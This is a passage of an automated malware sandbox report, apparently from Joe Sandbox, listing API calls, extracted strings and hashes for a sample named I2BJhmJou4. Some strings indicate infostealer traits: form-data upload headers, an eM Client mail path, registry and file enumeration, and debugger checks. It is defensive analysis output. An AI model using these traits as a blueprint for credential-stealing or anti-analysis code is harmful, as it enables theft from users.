                                                          • Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                          • GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 485612231-0
                                                          • Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                          • Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
                                                          • Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                          • Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02ED0223,?,?), ref: 02ED0E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02ED0223,?,?), ref: 02ED0E1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: 2728ec6266eccd2df74ccad318daa4bcd13064fc6acaeedfbc78d4ad9a9bc59b
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: 33D0123114512877DB002AA4DC09BCD7B1CDF05B66F048011FB0DD9080C770954146E5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                          • Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
                                                          • Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                          • Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                          • Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
                                                          • Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                          • Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389
                                                          APIs
                                                            • Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,755AF770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                          • Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
                                                          • Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                          • Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                          • Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
                                                          • Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                          • Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                          • Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
                                                          • Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                          • Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02F69C3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F69000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2f69000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction ID: e78b53b8b946b2197d1a57348711677983769f7f834b410c5d0e939825deba98
                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction Fuzzy Hash: 5D112B79A00208EFDB01DF98C989E99BBF5EF08350F058094FA489B361D371EA50DF80
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
                                                          • API String ID: 1659193697-3907602706
                                                          • Opcode ID: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                          • Instruction ID: d0c50640287b854dc98303e29e745f74e8bd18d410da6aba018040be517a087a
                                                          • Opcode Fuzzy Hash: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                          • Instruction Fuzzy Hash: 55F21A72D8061A8BDF248F588D556BD7BB0AB0431CF65A52BE505FF390F7708A42CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Content-Disposition: form-data; name="$A@6e$A@6e$Content-Type: attachment/x-object$RY30$SqDe87817huf871793q74$^^4$^^4$ame=$ilen
                                                          • API String ID: 4218353326-1595699696
                                                          • Opcode ID: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                          • Instruction ID: 2d689a8b6144ae040ff6817911910587bd341415a88b77611baba4cffa878017
                                                          • Opcode Fuzzy Hash: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                          • Instruction Fuzzy Hash: EC72A771D442198BDF18CF98D9855FEBBB0EB14314F24056BE915EB360E3788A858BCB
                                                          APIs
                                                          • wsprintfW.USER32 ref: 02F04942
                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 02F0498C
                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,00000001), ref: 02F0500C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumOpenwsprintf
                                                          • String ID: $jRk$$jRk$?$TT4$TT4$y_B>$y_B>
                                                          • API String ID: 934838074-1833258458
                                                          • Opcode ID: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                          • Instruction ID: 5a628203852a4aec2e543b4c1136e657053a8e23d0e019c6f775b44711b10e35
                                                          • Opcode Fuzzy Hash: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                          • Instruction Fuzzy Hash: 3062E7B1E0021A8BDF24CA989CD46BDBAB1BB54394F145626D715EB2D0D3B48A40FF92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strncpy
                                                          • String ID: $jRk$$jRk$3Z@$576xed$TT4$TT4$x_B>$y_B>$y_B>
                                                          • API String ID: 2961919466-3812700333
                                                          • Opcode ID: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                          • Instruction ID: c1f0278ec094f6be02d202c53d620e15fc525e7d6860b659e372b79efda81f17
                                                          • Opcode Fuzzy Hash: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                          • Instruction Fuzzy Hash: 3982DBB1D0051A8BDF28DB68C9451BEB670EB5C310F29662BE505EB360D738DE418B9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 0-3549259986
                                                          • Opcode ID: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                          • Instruction ID: 54f17f4a672923cfd4e7c45fe2917fa1b8e0eb386ed75c200b5acee344018555
                                                          • Opcode Fuzzy Hash: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                          • Instruction Fuzzy Hash: 7FE20DB1E802199BDF24CE98C8856BE7B71AB14714F18A557F50BFF390D3709A42CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Content-Disposition: form-data; name="$ &$($:[$SqDe87817huf871793q74
                                                          • API String ID: 4218353326-898291561
                                                          • Opcode ID: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                          • Instruction ID: fda5cd55cfb9f0796932eaeb7ac8b2d4ab06e0c9493bffbe09938a436643aec3
                                                          • Opcode Fuzzy Hash: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                          • Instruction Fuzzy Hash: 7F128DB090560A8BCF18CF58C9901BEBBB1FF54354F24592BE855EB394D7388991CB8B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strncpy
                                                          • String ID: $jRk$$jRk$TT4$TT4$mE$x_B>$y_B>$y_B>
                                                          • API String ID: 2961919466-2403683918
                                                          • Opcode ID: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                          • Instruction ID: dc2ecfd25276403af2c9dc50eab958ae4cee9600dc500b703a15777aac136b85
                                                          • Opcode Fuzzy Hash: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                          • Instruction Fuzzy Hash: A28208B2E002198BDF24CA98D8D46BDB7B5BF08294F64052BD615EB3D0D374DA90DF92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: f3@$x_B>$y_B>$y_B>
                                                          • API String ID: 0-2758273646
                                                          • Opcode ID: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                          • Instruction ID: 769378b0013e5f891025f4b50e79353ec4a26f3ac52f3a61e025b4fcd72a7191
                                                          • Opcode Fuzzy Hash: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                          • Instruction Fuzzy Hash: 2BC1A1756183019BCB2C8A19C99153EBAE5AB85314F14893FF556EB3F0E338D8419B4B
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: _strlen
• String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
• API String ID: 4218353326-1811093487
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: _strlen
• String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
• API String ID: 4218353326-1100714106
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID:
• String ID: $jRk$$jRk$ST4$TT4$q7 C$q7 C$y_B>
• API String ID: 0-4120928008
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: File$CloseCreateHandleModuleName
• String ID: T5 S$U5 S$U5 S$]cnq$fS))
• API String ID: 2106025501-2879408294
Memory Dump Source
• Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
Similarity
• API ID: ExitProcessSleep
• String ID: Ku^%$Ku^%
• API String ID: 911557368-1067927601
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID:
• String ID: (lu$)lu$)lu$n_v$n_v
• API String ID: 0-3830700584
Memory Dump Source
• Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
Similarity
• API ID:
• String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%
• API String ID: 0-3469696018
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00469144,?,02EDBA31,02EDCC5B,?,?,?), ref: 02EDAEC5
• lstrcatW.KERNEL32(?,0045FD78,?,?,?,?,?,?,?,?,00469144,?,02EDBA31,02EDCC5B,?,?), ref: 02EDAF29
Memory Dump Source
• Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
APIs
• FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
• FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
• FindClose.KERNEL32(00000000), ref: 004520F4
• FindClose.KERNEL32(00000000), ref: 00452117
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:
• API String ID: 1164774033-0
APIs
• FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F222BE
• FindNextFileW.KERNEL32(00000000,?), ref: 02F22339
• FindClose.KERNEL32(00000000), ref: 02F2235B
• FindClose.KERNEL32(00000000), ref: 02F2237E
Memory Dump Source
• Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:
• API String ID: 1164774033-0
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: _strlen
• String ID: 0$8
• API String ID: 4218353326-46163386
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043CEA1
• IsDebuggerPresent.KERNEL32 ref: 0043CF6D
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043CF8D
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043CF97
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
Memory Dump Source
• Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
Similarity
• API ID:
• String ID: Mail Clients\eM Client$]^4$^^4$^^4
• API String ID: 0-1928883120
Memory Dump Source
• Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
Similarity
• API ID: QueryVirtual
• String ID: ]^4$^^4$^^4$^^4
• API String ID: 1804819252-2923853987
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00405C85), ref: 0044E433
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00405C85), ref: 0044E43D
• UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,00405C85), ref: 0044E44A
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 00424C0E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00424C22
• CloseHandle.KERNEL32(00000000), ref: 00424C2E
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: File$CloseCreateHandleModuleName
• String ID:
• API String ID: 2106025501-0
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID: _strlen
• String ID: =`f\
• API String ID: 4218353326-984147390
Memory Dump Source
• Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
Similarity
• API ID:
• String ID: 3333$UUUU$UUUU
• API String ID: 0-1588839328
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                          • Instruction ID: d31693203e36b13fa643c34ed7d2e873ec4fc83637a871ea5abd7a03a4c8c85c
                                                          • Opcode Fuzzy Hash: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                          • Instruction Fuzzy Hash: 59F14071E012199FDF14CFA9C8806AEB7B1FF89314F15826EE915A7390DB34AD41CB94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                          • Instruction ID: 96dab4b835c1d2911bf40d9d6a132ec542a2b6b418b8a98001ccf647f5ee93c3
                                                          • Opcode Fuzzy Hash: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                          • Instruction Fuzzy Hash: B6F15E71E012199FEF14CFA9C980AADB7B1FF88394F658269D915AB380D730A905CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: y_B>$y_B>
                                                          • API String ID: 0-2639510964
                                                          • Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                          • Instruction ID: c217e240e4de63698dbdc007ec6427f3aed3e10ff69f5bbbebf730a7c1cd9681
                                                          • Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                          • Instruction Fuzzy Hash: B5328371D0011A8BDF249A9889916BFB670EF58320F24792BD515FB390D73C9E428BDA
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D61E
                                                            • Part of subcall function 0044C5A0: _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                            • Part of subcall function 0044C5A0: __FindPESection.LIBCMT ref: 0044C6D1
                                                          • _CallDestructExceptionObject.LIBVCRUNTIME ref: 0043D6A0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record
                                                          • String ID:
                                                          • API String ID: 4086067019-0
                                                          • Opcode ID: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                          • Instruction ID: d36a7cbcb2159855d2e740cbd3865162507ac70638f688864eb4f2737716b515
                                                          • Opcode Fuzzy Hash: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                          • Instruction Fuzzy Hash: BC21FC72D01204ABDB14EF69DCC19ABBBA5FF48314F098069ED198B246E734F915CBE4
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00418E08,FFFFFFF9,?,?,?,?,00418E08,00000000), ref: 00446164
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446183
                                                          Memory Dump Source
